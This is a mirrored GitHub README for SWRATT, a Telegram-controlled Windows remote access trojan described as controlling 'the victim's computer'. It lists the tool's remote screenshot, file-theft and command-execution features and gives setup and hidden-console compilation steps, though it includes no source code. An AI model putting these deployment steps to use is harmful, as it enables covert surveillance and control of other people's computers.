GithubHelp home page GithubHelp logo

suburbanno / swratt Goto Github PK

View Code? Open in Web Editor NEW
49.0 6.0 23.0 20 KB

๐Ÿค– โ˜ ๏ธ ๐Ÿ’ฌ A simple Telegram Bot that controls the victim's computer.

License: MIT License

Python 100.00%
telegram-bot rat remote-access python windows tool trojan telegram-rat screenshots

swratt's Introduction

SWRATT

A simple Windows Remote Administration Tool using Telegram bot function.

Features:

  • Show current directory
  • Change current directory
  • List current or specified directory
  • Download file from the target
  • Screenshots
  • Execute file
  • Execute cmd

Screenshots:

Installation & Usage:

  • Clone this repository: git clone https://github.com/Suburbanno/SWRATT.git
  • Set up a new Telegram bot talking to the @BotFather.
  • Copy this token and replace it in token = "xxxxxxxxxxxxxxx".
  • Run main.py
    • Copy your chat_id from the console and replace it in trusted_users = [xxxxx] and group id in trusted_chats = [-xxxxx]if you need.
    • You have the option to get your id and the group id through this @my_id_bot bot, for that you must put the bot in a group exists or create a test group
  • Go to your bot on telegram and send /help command to the bot to test it.

Commands:

/screen - screenshot PC
/cd - change current directory
/download - download file from target
/ls - list contents of current or specified directory
/pwd - show current directory
/run - run a file
/cmd - execute cmd

Compiling:

How To Compile:

pyinstaller --icon YOUR_ICON --noconsole -F main.py


  • --icon YOUR_ICON Uses the icon in the format .ICO
  • --noconsole Does not show the console while the program is running
  • -F Compiles the file in .exe

Contributing:

Contributions and feature requests are welcome!
Feel free to open a issue or pull request.

Disclaimer:

This tool should be used only for studies or in controlled environments under authorization, otherwise it is illegal..

License:

The MIT License

swratt's People

Contributors

dependabot[bot] avatar suburbanno avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.